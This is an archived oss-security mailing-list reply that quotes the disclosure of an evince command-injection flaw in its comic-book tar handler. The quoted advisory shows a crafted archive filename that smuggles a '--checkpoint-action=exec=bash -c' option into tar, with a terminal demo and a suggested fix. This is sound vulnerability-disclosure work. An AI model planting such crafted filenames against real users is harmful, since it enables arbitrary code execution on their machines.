Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Fri, 14 Jul 2017 19:27:53 -0500
From: Brandon Perry <bperry.volatile@...il.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2017-1000083: evince: Command injection
 vulnerability in CBT handler


> On Jul 13, 2017, at 10:43 AM, Johannes Segitz <jsegitz@...e.de> wrote:
> 
> Hello,
> 
> we were asked to bring this to distros and per list policy it is now made
> public on this list.
> 
> From: Felix Wilhelm
> =========================
> The comic book backend in evince 3.24.0 is vulnerable to a command
> injection bug that can be used to execute arbitrary commands when a cbt
> file is opened:
> 
> cbt files are simple tar archives containing images. When a cbt file is
> processed, evince calls
> "tar -xOf $archive $filename" for every image file in the archive:
> 
> // backend/comics/comics-document.c: 914
>        command_line = g_strdup_printf ("%s %s %s",
>                                        comics_document->extract_command,
>                                        quoted_archive,
>                                        quoted_filename);
> 
> While both the archive name and the filename are quoted to not be
> interpreted by the shell,
> the filename is completely attacker controlled an can start with "--"
> which leads to tar interpreting it
> as a command line flag.
> 
> This can be exploited by creating a tar archive with an embedded file
> named something
> like this: "--checkpoint-action=exec=bash -c 'touch ~/covfefe.evince;'.jpg"
> 
> (Make sure evince is not sandboxed by apparmor before trying to reproduce
> the attached POC)

Not sure if the list ate the attachment, but I don’t see it available. Perhaps a link to it somewhere else would be of use?

> 
> fwilhelm@... $ tar -tf poc.cbt
> --checkpoint-action=exec=bash -c 'touch ~/covfefe.evince;'.jpg
> fwilhelm@... $ ls -la ~/covfefe.evince
> ls: cannot access covfefe.evince: No such file or directory
> fwilhelm@... $ evince poc.cbt
> fwilhelm@... $ ls -la ~/covfefe.evince
> -rw-r----- 1 fwilhelm eng 0 Jun 28 11:05 /home/fwilhelm/covfefe.evince
> 
> An easy way to fix this would be to change the  ComicBookDecompressCommand
> entry for tar to
> {"%s -xOf --"          , "%s -tf -- %s"      , NULL             , FALSE,
> NO_OFFSET}
> 
> Please credit Felix Wilhelm from the Google Security Team in all releases,
> patches and advisories related to this issue.
> =========================
> 
> Additional information by Michael Catanzaro:
> =========================
> It looks like the affected code was deleted right after the Evince 3.24.0
> release, so master is not vulnerable. But current releases are. I'll ask
> around to see how we want to handle this.
> =========================
> 
> and
> 
> =========================
> Since it looks like this can probably be used to take over a user account
> with no user interaction beyond visiting a malicious webpage (via drive-by
> web browser download -> nautilus thumbnailer) I guess we should probably do
> a coordinated disclosure instead of just dropping new releases with no
> warning.
> =========================
> 
> This is tracked as CVE-2017-1000083, further information can be found at
> https://bugzilla.gnome.org/show_bug.cgi?id=784630
> 
> Johannes
> --
> GPG Key E7C81FA0       EE16 6BCE AD56 E034 BFB3  3ADD 7BF7 29D5 E7C8 1FA0
> Subkey fingerprint:    250F 43F5 F7CE 6F1E 9C59  4F95 BC27 DD9D 2CC4 FD66
> SUSE Linux GmbH, GF: Felix Imendörffer, Jane Smithard, Graham Norton
> HRB 21284 (AG Nürnberg)


[ CONTENT OF TYPE application/pgp-signature SKIPPED ]

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ